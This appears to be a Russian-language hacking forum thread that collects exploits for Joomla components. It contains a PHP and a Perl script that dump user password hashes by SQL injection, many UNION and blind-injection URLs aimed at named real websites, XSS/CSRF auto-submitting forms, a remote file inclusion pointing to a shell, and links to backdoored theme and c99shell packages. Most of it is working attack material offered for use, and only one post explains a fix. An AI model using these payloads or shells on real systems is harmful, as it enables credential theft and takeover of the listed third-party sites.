--------------------------

PREPARATION:
--------------------------
You need a valid Account on the Joomla 1.0.15 Site + Community Builder Suite 1.1.0:


Community Builder Suite 1.1.0:
http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,1175.html

PMS enhanced Version 2.0.4 J 1.0
http://www.make-website.de/script-downlaods?task=summary&cid=123&catid=214


Install Joomla 1.0.15
Install Community Builder
Install PMS Enhanced
Activate the Ignorlist in Components->PMS Enhanced->Config
Tab: Backend -> Ingorlist: Yes


Create a valid User on the target Joomla 1.0.15 System with Community Builder,
login and copy the cookieinformation into the $cookie var below,
adjust the User-Agent on your Post Header dependent on your Browser.


Notice: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
because the cookie-name is dependent on your browser.
--------------------------

USAGE:
--------------------------
Run this script! If there's not shown a page that prompt you to login, the attack was successful.
Then go to the ignore list: www.yourtargetsite.com/index.php?option=com_pms&Itemid=&page=ignore
and you will see some username and passwords in the selectbox :-)

Have fun!!

----------------------------------------------------
*/


$host = "localhost"; //your target Joomla Site
$cookie = "290cd01070fed63ac53f84f5c91d2bd9=a5846a8c64962e143 67d5c7298f6c72c"; //replace this with your own cookie values
$useragent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13\r\n";

//NOTICE: Pay attention on your User-Agent in the POST Header, it have to be the same as you have logged in,
//because the cookie-name is dependent on your browser.

//Don't change anything below
$path = "/joomla/index.php?option=com_pms&Itemid=&page=ignore"; //dont change this
$data_to_send = "no_entry=keine+Eintr%E4ge&save=Ignorliste+speichern&filter_site_users=alle&ignore_ids=|63, 111 ) AND 1=2 UNION SELECT 1,concat(username,char(0x3a), password),3 from jos_users -- /* |"; //you don't have to change this


print_r($post = PostToHost($host, $path, $cookie, $data_to_send, $useragent));



function PostToHost($host, $path, $cookie, $data_to_send, $useragent) {
$fp = fsockopen($host, 80);
fputs($fp, "POST $path HTTP/1.1\r\n");
fputs($fp, "Host: $host\r\n");
fputs($fp, "User-Agent: $useragent");
fputs($fp, "Cookie: $cookie\r\n");
fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
fputs($fp, "Content-length: ". strlen($data_to_send) ."\r\n");
fputs($fp, "Connection: close\r\n\r\n");
fputs($fp, $data_to_send);
while(!feof($fp)) {
$res .= fgets($fp, 128);
}
fclose($fp);

return $res;
}

?>

# milw0rm.com [2009-08-07]

COM_SOBI2
SQL INJECTION
http://www.sigsiu.net/download/components/sigsiu_online_business_index_2_for_joomla_1.0.x.ht ml
Проверял только на Joomla_1.0.x

index.php?option=com_sobi2&sobi2Task=search&Itemid=26

benchmark

в поле поиск вводить ')and+benchmark(10000000,benchmark(10000000,md5(no w())))# a Обязательно удалить все пробелы
и нажимать поиск)

Уязвимость: SQL-Inj
Компонент: The Publications
Уязвимость в файле publications.php
Уязвимый код:

$query = "SELECT * FROM #__content WHERE catid=$id ORDER BY title DESC";
Пример:
http://www.bscic.gov.bd/index.php?option=com_publications&Itemid=20&lang=en&id=6/**/and/**/1=0/**/union/**/select/**/1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9, 10,11,12,13,14+from+jos_users--

Эксплоиты SQL-инъекции в компонентах Joomla

На веб-сайте PacketStorm, посвященному компьютерной безопасности, было опубликовано сразу 7 эксплоитов с демонстрацией SQL-инъекции в дополнительных компонентах популярной системы управления контентом Joomla. Эксплоиты относятся к следующим компонентам системы: com_speech, com_pressrelease, com_mediaalert, com_joomloc, com_lucygames, com_tpdugg и com_bfsurvey_profree.

Joomla Speech (эксплоит) (http://packetstormsecurity.org/0909-exploits/joomlaspeech-sql.txt)
Joomla Press Release (эксплоит) (http://packetstormsecurity.org/0909-exploits/joomlapr-sql.txt)
Joomla Media Alert (эксплоит) (http://packetstormsecurity.org/0909-exploits/joomlamediaalert-sql.txt)
Joomla Joomloc (эксплоит) (http://packetstormsecurity.org/0909-exploits/joomlajoomloc-sql.txt)
Joomla LucyGames (эксплоит) (http://packetstormsecurity.org/0909-exploits/joomlalucygames-sql.txt)
Joomla TPDugg (эксплоит) (http://packetstormsecurity.org/0909-exploits/joomlatpdugg-sql.txt)
Joomla BF Survey Pro Free (эксплоит) (http://packetstormsecurity.org/0909-exploits/joomlabfsurvey-sql.txt)

Уязвимость: SQL-Inj
Компонент: Jeporter
Версия: 2.0
Уязвимость в файле jeporter.php
Уязвимый код:

$cid = mosGetParam( $_REQUEST, 'cid', false);

$sql = "SELECT * FROM #__jeporter WHERE id= ".$cid;
$database->setQuery( $sql );
$report = NULL;
$database->loadObject( $report );

$cid = $report->id;
$title = $report->title;
$jquery = $report->jquery;

$sql = "SELECT * FROM #__jeporter_fields WHERE jeportid= ".$cid;
$database->setQuery( $sql);
$rows = $database->loadObjectList();


Пример:
http://www.nationalaidsstrategy.org/index.php?option=com_jeporter&task=showreport&cid=-4+union+select+1,concat_ws(0x3a,username,password) ,3,4,5+from+jos_users--

Мож кому пригодится... Тема с шеллом внутри..
после усьановки темы шелл будет в http://site.name/templates/jd_lagoon/ads.php

http://depositfiles.com/files/lhtkdh0m1

Уязвимость: Blind SQL-Inj
Компонент: com_clan_members
Версия: 0.9.2.2b
Уязвимость в файле clan_members.html.php
Уязвимый код:

$database->setQuery("SELECT * FROM #__clan_members WHERE id = $id" );
$member = $database -> loadAssocList();
$database->setQuery("SELECT * FROM #__users WHERE id = $id AND block = '0'" );
$usersdata = $database -> loadAssocList();
$database->setQuery("SELECT * FROM #__clan_members_squadperuser WHERE uid=$id" );
$rowsquadperuser = $database -> loadObjectList();
$database->setQuery("SELECT * FROM #__clan_members_comment WHERE memberid=$id" );
$rowmembercomment = $database -> loadObjectList();
$database->setQuery("SELECT * FROM #__clan_members_fields WHERE published=1 ORDER BY ordering" );
$rowmemberfields = $database -> loadObjectList();
#Check if the user is logged in into the side
$database->setQuery("SELECT count(distinct(userid)) as user_online FROM #__session WHERE guest=0 AND userid = $id");
$online = $database->loadResult();
foreach($rowsquadperuser as $squadperuser)
{
$database->setQuery("SELECT * FROM #__clan_members_squad WHERE published = '1' AND id = '$squadperuser->sid'" );
$squadname = $database -> loadAssocList();
if($squadname[0]["squadpicture"] != '' || $squadname[0]["squadname"] != '')
{
$squadpicture_array[$i+1] = $squadname[0]["squadpicture"];
if($i == 0) $squadnames .= $squadname[0]["squadname"]; else $squadnames .= ",".$squadname[0]["squadname"];
$i++;
}
}


Пример:
true -> http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=5&task=showClanMemberDetails
false -> http://www.team-halo.net/index.php?option=com_clan_members&id=62+and+substring(version(),1,1)=4&task=showClanMemberDetails

Уязвимость: RFI
Компонент: UH_Events
Версия: 0.99.0RC3a
Уязвимость в файле admin.uhevents.php
Требования: register_globals & allow_url_fopen = On
Уязвимый код:

require_once( $mosConfig_absolute_path."/administrator/components/$option/uhevents_config.php");


Эксплойт:.../components/uh_events/admin.uhevents.php?mosConfig_absolute_path=http://shell?

Уязвимость: SQL
Компонент: Projects
Случайно наткнулся)

?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Vers ion(),Database(),User()),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
Пример:

http://www.inab.org/?option=com_projects&Itemid=62&idProyecto=27+UNION+SELECT+1,2,CONCAT_WS(0x3a,Vers ion(),Database(),User()),4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28--

Сюда же
Уязвимость: SQL
Компонент: com_nodes
?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal

http://www.inab.org/index.php?option=com_nodes&Itemid=61&node=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12--&info=personal

Сканер уязвимостей для Joomla

http://sourceforge.net/projects/joomscan/

Уязвимость: SQL-Inj
Компонент: DJ Catalog
Версия: 1.0.4
Требования: magic_quotes_gpc = off
Файл: /components/com_djcatalog/models/show.php

function getAllElements(){

global $mainframe;
$par =& $mainframe->getParams('com_djcatalog');

$limit = $par->get('limit_items_show');

$limitstart = JRequest::getVar('limitstart', 0, '', 'int');
$producer_id = JRequest::getVar('pid', 0, '', 'int');
$search = '';
if(JRequest::getVar('search','0','string')!='0'){
$search = " AND name LIKE '%".JRequest::getVar('search','0','string')."%' ";
}

$producer = '';
if($producer_id){
$producer = ' AND producer_id LIKE '.$producer_id. '';
}
$order = JRequest::getVar('order');
$db= &JFactory::getDBO();
switch ($order) { ... }
$query = "SELECT * FROM #__djcat_items WHERE 1 ".$producer.$search.$orderQuery;
$db->setQuery($query);
$Arows = $this->_getList($query, $limitstart, $limit);

return $Arows;
}

Эксплойт:
/index.php?option=com_djcatalog&view=show&search='+and+0+union+select+1,2,3,username,5,passw ord,7,8,9,10,11+from+%23__users%23

Раскрытие Путей
Компонент : jevents
index.php?option=com_jevents&task=icalrepeat.detail&evid[]=33&Itemid=0&year=2009&month=11&day=03&uid=d3e68405af27abcc1522182b0970abc0

__http://www.ccebc.com/index.php?option=com_jevents&task=icalrepeat.detail&evid[]=100&Itemid=0&year=2009&month=11&day=11&uid=455d8ad5611ba60fdf1eaab2215e324c&lang=us

сорцов нет, наткнулся просто

Уязвимость : SQL
Компонент : com_rsgallery2
Версия : N/A

index.php?option=com_rsgallery2&Itemid=1&page=inline&id=9&catid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--&limitstart=1

__http://etherealangels.com/index.php?option=com_rsgallery2&Itemid=1&page=inline&id=9&catid=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12, 13--&limitstart=1


__http://etherealangels.com/index.php?option=com_rsgallery2&Itemid=1&page=inline&id=9&catid=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13+from+jos_users--&limitstart=1

куча логов и пассов

ЗЫ вроде не видел ни где

Раскрытие путей
Компонент : com_jshopping

index.php?option=com_jshopping&task=product&product_id[]=27&category_id=8&Itemid=7
index.php?option=com_jshopping&task=product&product_id=27&category_id[]=8&Itemid=7

__http://www.fitofilter.com/index.php?option=com_jshopping&task=product&product_id[]=27&category_id=8&Itemid=7

__http://polimobil.md/index.php?option=com_jshopping&task=product&product_id=18&category_id[]=11&Itemid=69

Уязвимость : Blind - SQL
Компонент : com_ci

index.php?option=com_ci&task=viewCi&sector_id=77+and+substring(version(),1,1)=4&m=m&Itemid=1210&send2friend=index.php%3Foption%3Dcom_ci%26task%3Dv iewCi%26sector_id%3D77%26m%3Dm%26Itemid%3D1210

false: _http://www.hkz.nl/index.php?option=com_ci&task=viewCi&sector_id=77+and+substring(version(),1,1)=4&m=m&Itemid=1210&send2friend=index.php%3Foption%3Dcom_ci%26task%3Dv iewCi%26sector_id%3D77%26m%3Dm%26Itemid%3D1210

True: _http://www.hkz.nl/index.php?option=com_ci&task=viewCi&sector_id=77+and+substring(version(),1,1)=5&m=m&Itemid=1210&send2friend=index.php%3Foption%3Dcom_ci%26task%3Dv iewCi%26sector_id%3D77%26m%3Dm%26Itemid%3D1210

Уязвимость : Blind - SQL
Компонент : com_acprojects

true : _http://www.artcom.de/index.php?lang=en&option=com_acprojects&id=17+and+substring(version(),1,1)=4&Itemid=115&page=6

False : _http://www.artcom.de/index.php?lang=en&option=com_acprojects&id=17+and+substring(version(),1,1)=5&Itemid=115&page=6

Компонент : com_acnews
_http://www.artcom.de/index.php?option=com_acnews&task=view&id=449+and+substring(version(),1,1)=4--&Itemid=136&page=0&lang=en

SQL
Компонент : com_acjobs
_http://www.artcom.de/index.php?option=com_acjobs&Itemid=-120+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17--&lang=en

вывод в title

PS на еще одном не пашут скули =\ мб версия другая))

компонент: com_kunena
версии: качал последние две (Kunena1.5.6, Kunena1.5.5)
file: default/plugin/userlist/userlist.php
...
$orderby = JRequest::getVar('orderby', 'registerDate');
$direction = JRequest::getVar('direction', 'ASC');
$search = JRequest::getVar('search', '');
...//ещё переменные & формирование 1го $query
if ($search != "") {
$query .= " WHERE (u.name LIKE '%$search%' OR u.username LIKE '%$search%')";
}

$kunena_db->setQuery($query);
$total = $kunena_db->loadResult();
... //определение 2-го $query
if ($search != "")
{
$query .= " WHERE (name LIKE '%$search%' OR username LIKE '%$search%')";
$query_ext .= "&amp;search=" . $search;
}

$query .= " ORDER BY $orderby $direction, id $direction";
... // +limit
$kunena_db->setQuery($query);
...
описание getvar() из класса JRequest здесь (http://api.joomla.org/Joomla-Framework/Environment/JRequest.html#getVar)
решение:
$search=addslashes(JRequest::getVar('search',''));
для $orderby & $direction использовать switch
эксплуатация:
?search='){inj} //magic_quotes_gps off
?orderby={inj}
?direction=,{inj}

Не я нашел, это с jhttp://joomla-support.ru/showthread.php?p=75180#post75180 соб - сно
Всем привет.

Нашел баг в sh404SEF. плохая фильтрация значений параметров
версия: 1.0.20_Beta - build_237

в админке при сохранении настроек компонента. я спалил на параметре Insert before page title.
если поставить значение например такое:
\"; echo 'test'; "Формос ТК официальный дистрибъютор 3М. то сл. можно выполнить любую функцию в джумле и на php, например вывод значения из configuration.php и т.п. или удаление файлов и т.п.

вообщем такое дело. будьте осторожны!

Joomla Joaktree Component v1.0 SQL Injection Vulnerability

Author: Don Tukulesto

Published: 2009-12-01

http://extensions.joomla.org/extensions/miscellaneous/genealogy/9842

Version() : 1.0

Vulnerability : SQL injection

http://server/index.php?option=com_joaktree&view=joaktree&treeId=[SQL]

[ Exploit ]

-1+union+select+1,1,1,version(),1,666,1,concat(user name,0x3a,password),1,1,1,1,1,1,1,1+from+jos_users--

может кому нить пригодиться последнаяя версия джумла Joomla_1.5.15-Stable-Full_Package.zip
у себя проверил

http://localhost/lastjoom/index.php?limitstart=-5


наш путь:

Warning: Invalid argument supplied for foreach() in Z:\home\localhost\www\lastjoom\components\com_cont ent\models\frontpage.php on line 104

Сёдняшний сплойт:
http://www.exploit-db.com/exploits/10407
От автора SOA Crew
Единственное непонятно куда он там данные то выводит, на главной их что то не видно ;(

Бесполезная бага в Joomla или "логическая sql-инъекция"

Взглянем на скрипт \joomla\administrator\components\com_users\views\u sers\view.html.php.
Там есть такой участок:
$query = 'SELECT a.*, g.name AS groupname'
. ' FROM #__users AS a'
. ' INNER JOIN #__core_acl_aro AS aro ON aro.value = a.id'
. ' INNER JOIN #__core_acl_groups_aro_map AS gm ON gm.aro_id = aro.id'
. ' INNER JOIN #__core_acl_aro_groups AS g ON g.id = gm.group_id'
. $filter
. $where
. ' GROUP BY a.id'
. $orderby
;
Выше определена переменная $orderby:
$orderby = ' ORDER BY '. $filter_order .' '. $filter_order_Dir;
Причём переменные $filter_order и $filter_order_Dir определяются пользователем.
В админке во всех секциях есть hidden-поля в формах с этими переменными.
Что ж, подставим левые значения, например, asd и fgh соответственно: http://localhost/joomla/administrator/index.php?option=com_content&filter_order=asd&filter_order_Dir=fgh
Получаем следующий ответ:
500 - An error has occurred!

DB function failed with error number 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'fgh, section_name, cc.title, c.ordering LIMIT 0, 20' at line 1 SQL=SELECT c.*, g.name AS groupname, cc.title AS name, u.name AS editor, f.content_id AS frontpage, s.title AS section_name, v.name AS author FROM jos_content AS c LEFT JOIN jos_categories AS cc ON cc.id = c.catid LEFT JOIN jos_sections AS s ON s.id = c.sectionid LEFT JOIN jos_groups AS g ON g.id = c.access LEFT JOIN jos_users AS u ON u.id = c.checked_out LEFT JOIN jos_users AS v ON v.id = c.created_by LEFT JOIN jos_content_frontpage AS f ON f.content_id = c.id WHERE c.state != -2 ORDER BY asd fgh, section_name, cc.title, c.ordering LIMIT 0, 20
Как мы видим, наши значения попали в sql-запрос. Но они всё же фильтруются - большая часть спецзнаков не пропускается, разрешены, например, точки, поскольку они нужны в нормальном запросе.
Казалось бы, из такой "sql-инъекции" ничего кроме префикса таблиц не выжать.
Однако, просмотрим админку и увидим страницу управления пользователями: http://localhost/joomla/administrator/index.php?option=com_users
Вышеупомянутые параметры в этой секции используются для сортировки пользователей (подставляются в ORDER BY).
И тут внезапно: а что если отсортировать их по паролю?
Ну: http://localhost/joomla/administrator/index.php?option=com_users&filter_order=a.password
Теперь можно создать пользователя, сделать ему какой-то пароль, затем отсортировать на этой странице, и мы увидим, где по алфавиту находится хеш админа - выше или ниже хеша нашего пользователя.
Далее можно организовать бинарный поиск и вытащить весь хеш админа.
Конец.

P.S. Разумеется, эта бага в Joomla совершенно ничего не даёт, поскольку она в админке, а xsrf там нет. Я написал про неё лишь для того, чтобы показать саму возможность подобных атак. Такая ситуация может возникнуть, например, в форумном движке, где список пользователей может быть доступен каждому. Мораль: переменные надо не только фильтровать на спецсимволы, но и проверять введённые данные на логическую совместимость.

P.P.S. В vbulletin, например, скрипт memberlist.php ограничивает параметры для сортировки:
switch ($sortfield)
{
case 'username':
$sqlsort = 'user.username';
break;
case 'joindate':
$sqlsort = 'user.joindate';
break;
case 'posts':
$sqlsort = 'user.posts';
break;
case 'lastvisit':
$sqlsort = 'lastvisittime';
break;
case 'reputation':
$sqlsort = iif($show['reputationcol'], 'reputationscore', 'user.username');
$secondarysortsql = ', user.username';
break;
case 'age':
if ($show['agecol'])
{
$sqlsort = 'agesort';
$secondarysortsql = ', user.username';
}
else
{
$sqlsort = 'user.username';
}
break;
default:
$sqlsort = 'user.username';
$sortfield = 'username';
}

Может кому нить пригодится, сам много раз сталкивался с проблемами заливки шелла с админки из за кривых привилегии,
вот сделал простенький модуль mod_joomla_c99shell

1) Заходим в "Менеджер расширений" выбираем "Загрузить файл пакета" загружаем наш файл mod_joomla_c99shell.zip
2) После удачного инсталла переходим в папку http://site.ru/modules/mod_joomla_c99shell/mod_joomla_c99shell.php
3) Заходим на наш шелл логин fixer пароль antichat (после можете поменять все там на свое усмотрение)

Модуль шелла можете скачать тут (http://fixer.whitehat.ru/mod_joomla_c99shell.zip) тестировал на Joomla 1.5.14

Постоянно обновляющийся список уязвимых плагинов.
http://docs.joomla.org/Vulnerable_Extensions_List

Файл : com_oscommerce
Уязвимость : LFI
сорри исходники так и не нашел

Особая фаза луны : Magic_qoutes = off

https://www.naadac.org/index.php?option=com_oscommerce&osMod=product_info'

Warning: include(components/com_oscommerce/product_info\'.php) [function.include]: failed to open stream: No such file or directory in /www/naadac.org/html/components/com_oscommerce/oscommerce.php(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 68

Dopk: inurl:index.php?option=com_oscommerce

Ам, вроде не боян, если баян ,то удалите..

Joomla XSS

XSS присутствует в компоненте com_admin.

Уязвимая строчка в \joomla\administrator\components\com_admin\admin.a dmin.html.php:
<input type="text" name="helpsearch" value="<?php echo $helpsearch;?>" class="inputbox" />
Заходим на http://localhost/joomla/administrator/index.php?option=com_admin&task=help.
Там есть поле для поиска. Текст из него не htmlspecialchar-ится, но какая-то странная фильтрация есть.
Почему-то, если набрать, скажем, так: "><img src="blabla....., этот тег обрезается, то есть написать новый тег у меня не получилось.
Что ж, приходится обходиться свойствами тега <input>.
XSS в post-параметре админки, поэтому она не работала бы без XSRF.
Собственно, сплойт:


<html>
<body>
<form action="http://localhost/joomla/administrator/index.php?option=com_admin&amp;task=help" method="post" name="adminForm">
<input class="text_area" type="hidden" name="option" value="com_admin" />
<input type="text" name="helpsearch" value='" size="1000" onmouseover="alert()' class="inputbox" />
<input type="submit" value="Go" class="button" id="xsrf"/>
<input type="hidden" name="task" value="help" />
</form>
<script>document.getElementById("xsrf").click();</script>
</body>
</html>



В чём суть: я сделал так, чтобы поле поиска стало длинным, так что, если админ проведёт мышкой по экрану, сработает xss. Вероятность этого весьма велика.

Уязвимость: SQL-Inj
Компонент: com_ezautos (проверял на v3.2.0)
Dopk: inurl:com_ezautos inurl: option
Файл: /components/com_ezautos/ezautos.php


switch ($task){

case 'helpers':
helpers($_REQUEST['id']);
break;

}

.......

function helpers($id){
global $database, $mainframe;

switch ($id) {
case '1':

if(isset($_GET['firstCode'])){

$query = "SELECT * FROM #__ezautos_model WHERE published='1' AND makeid=".$_GET['firstCode']." ORDER BY model DESC";
$database->setQuery( $query );
$rows = $database->loadObjectList();
echo "obj.options[obj.options.length] = new Option('Select Model','0');\n";
foreach ($rows as $row){
echo "obj.options[obj.options.length] = new Option('".$row->model."','".$row->moid."');\n";
}
}

break;
}

}


http://www.sfauto.ru/index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1+and+0+union+select+1,2,concat(username ,0x3a,password),4,5,6,7+from+%23__users+where+gid= 25+or+gid=24+and+block<>1--

SQL Injection в стандартных компонентах
1) Joomla Component com_wrapper
+================================================= ==================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+================================================= ==================================+

[?] ~ Note : sEc-r1z CrEw# r0x !
================================================== ============================
[?] Joomla Component com_wrapper SQL Blind Injection Vulnerability
================================================== ============================
[?] My home: [ http://sec-r1z.com ]
[?] Script: [ Joomla Component com_wrapper ]
[?] Language: [ PHP ]
[?] Founder: [ ./Red-D3v1L ]
[?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
[?] Fuck To : [ Zombie_KsA << big big big L4m3r ]
################################################## ######################

===[ Exploit SQL ]===

[»]SQL : [Path]/index.php?option=com_wrapper&view=wrapper&Itemid==[inj3ct C0dE]

[»]dem0:

This True :

http://www.doubleclick.ps/index.php?option=com_wrapper&view=wrapper&Itemid=92%20and%201=0

This False :

http://www.doubleclick.ps/index.php?option=com_wrapper&view=wrapper&Itemid=92%20and%201=1

================================================== ============================

#sEc-r1z.com Str1kEz y0u !

2) com_weblinks
################################################## ###############
# Securitylab.ir
################################################## ###############
# Application Info:
# Name: Joomla Component com_weblinks
################################################## ###############
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
################################################## ###############
Vulnerability:
http://site.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5
################################################## ###############
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
################################################## #################

3) com_xmap
################################################## ###############
# Securitylab.ir
################################################## ###############
# Application Info:
# Name: Joomla Component com_xmap
################################################## ###############
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
################################################## ###############
Vulnerability:
http://site.com/index.php?option=com_xmap&sitemap=2&Itemid=18-1 UNION SELECT 1,2,3,version(),5,6,7,8--
################################################## ###############
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir

Joomla XSS

XSS наподобии той, что в посте #103, но удобнее:

http://localhost/administrator/index.php?option=com_content&search=%22%20size=100%20onmouseover=alert()%20bla

Никаких CSRF и post не нужно

товарищи, кто подскажет как узнать полную версию Joomla? вариант с configuration.php-dist не прокатит.

товарищи, кто подскажет как узнать полную версию Joomla? вариант с configuration.php-dist не прокатит.
Версию можно посмотреть в файле /includes/version.php

Blind SQL Injection joomla component com_mytube (user_id)


#!/usr/bin/perl -w

#---------------------------------------------------------------------------------
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#---------------------------------------------------------------------------------

#Author : Chip D3 Bi0s
#Group : LatiHackTeam
#Email : chipdebios[alt+64]gmail.com
#Date : 15 September 2009
#Critical Lvl : Moderate
#Impact : Exposure of sensitive information
#Where : From Remote
#---------------------------------------------------------------------------

#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#Application : MyRemote Video Gallery
#version : 1.0 Beta
#Developer : Jomtube Team
#License : GPL type : Non-Commercial
#Date Added : Aug 24, 2009
#Download : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description :

#MyRemote Video Gallery is the most Powerful Video Extension made for Joomla 1.5x
#which will allow you to transform your Website into a professional looking Video
#Gallery with functionality that is similar to YouTube.com. MyRemote Video Gallery
#is an open source (GNU GPL) video sharing Joomla extension has been created
#specifically for the Joomla 1.5x (MVC) Framework and can not be used without Joomla.

#MyRemote Video Gallery gives you the option to Embed Videos from Youtube and offers
#the Framework so you can create your own Remote Plugins for other Remote Servers like
#Dailymotion, Google Video, Vimeo, Blip.tv, Clipser, Revver, a which will allow you to
#run your site for low cost since all the bandwidth usage and hard drive space is located
#on the video server sites. So if you already have a large library of Videos on some
#Remote Sites like Youtube.com you can build the Video Part of your Site Very Quickly.

#---------------------------------------------------------------------------


#I.Blind SQL injection (user_id)
#Poc/Exploit:
#~~~~~~~~~~~
#http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=X[blind]&option=com_mytube&Itemid=null
#X: Valid User_id

#+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
#+++++++++++++++++++++++++++++++++++++++


use LWP::UserAgent;
use Benchmark;
my $t1 = new Benchmark;

system ('cls');
print "\n\n";
print "\t\t[+] ---------------------------------[+]\n";
print "\t\t| | Chip d3 Bi0s | |\n";
print "\t\t| MyRemote Video Gallery Bsql | \n";
print "\t\t|joomla component com_mytube (user_id)| \n";
print "\t\t[+]----------------------------------[+]\n\n";


print "http://127.0.0.1/[path]/index.php?view=videos&type=member&user_id=62:\n";chomp(my $target=<STDIN>);

$w="Total Videos In Category";
$column_name="concat(password)";
$table_name="jos_users";


$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');

print "----------------Inyectando----------------\n";


$host = $target . "+and+1=1&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {

$host = $target . "+and+1=2&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
if ($content =~ /$regexp/) {print " [-] Exploit Fallo :(\n";}

else

{print " [-] Vulnerable :)\n";

$d=0;


for ($idusuario=62;$idusuario<=80;$idusuario++)

{

$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$idusuario."+limit+0,1),1,1))>0&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;
if ($content =~ /$regexp/) {$idusu[$d]=$idusuario;$d=$d+1}

}

print " [+] Usuario existentes : "." ".join(',', @idusu) . "\n";

print " [-] # Usuario que desea extraer : ";chomp($iduss=<STDIN>);

for ($x=1;$x<=32;$x++)
{

$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))>57&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host)); my $content = $res->content; my $regexp = $w;
print " [!] ";if($x <= 9 ) {print "0$x";}else{print $x;}
if ($content =~ /$regexp/)
{

for ($c=97;$c<=102;$c++)

{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;


if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=102;}
}


}
else
{

for ($c=48;$c<=57;$c++)

{
$host = $target . "+and+ascii(substring((SELECT+".$column_name."+from+".$table_name."+where+id=".$iduss."+limit+0,1),".$x.",1))=".$c."&option=com_mytube&Itemid=null";
my $res = $b->request(HTTP::Request->new(GET=>$host));
my $content = $res->content;
my $regexp = $w;

if ($content =~ /$regexp/) {$char=chr($c); $caracter[$x-1]=chr($c); print "-Caracter: $char\n"; $c=57;}
}


}

}

print " [+] Password :"." ".join('', @caracter) . "\n";

my $t2 = new Benchmark;
my $tt = timediff($t2, $t1);
print "El script tomo:",timestr($tt),"\n";

}
}

else

{print " [-] Exploit Fallo :(\n";}

milw0rm.com [2009-09-21]

XSS vulnerability in JComments

Уязвимые верси: 2.1.0.0 [07/08/2009] и, возможно, ранние
Уведомление JoomlaTune.com: 4 Мая 2010
Тип уязвимости: XSS
Статус: исправлено JoomlaTune.com
Степень опасности: Средний
Детали уязвимости: пользователь может выполнить произвольный JS код в уязвимом приложении. Уязвимость возникает из-за неправильной идентификации пользователя в "admin.jcomments.php". Успешное проведение атаки с помощью данной уязвимости может привести к потере конфиденциальных данных и краже идентификационной информации в виде куков.

Атакующий может использовать браузер для проведения атаки:
<form method="POST" action="http://joomla/administrator/index.php" name="main">
<input type="hidden" name="name" value='ComntrName"><script>alert(document.cookie)</script>'>
<input type="hidden" name="email" value="example@example.com">
<input type="hidden" name="comment" value="comment text">
<input type="hidden" name="published" value="1">
<input type="hidden" name="option" value="com_jcomments">
<input type="hidden" name="id" value="1">
<input type="hidden" name="task" value="save">
</form>
<script>
document.main.submit();
</script>
Решение: обновление к более поздней версии

(c)http://securityvulns.ru/Xdocument887.html

com_elite_experts
исходников не нашел

Expl:
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=-38+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+--+

Example:
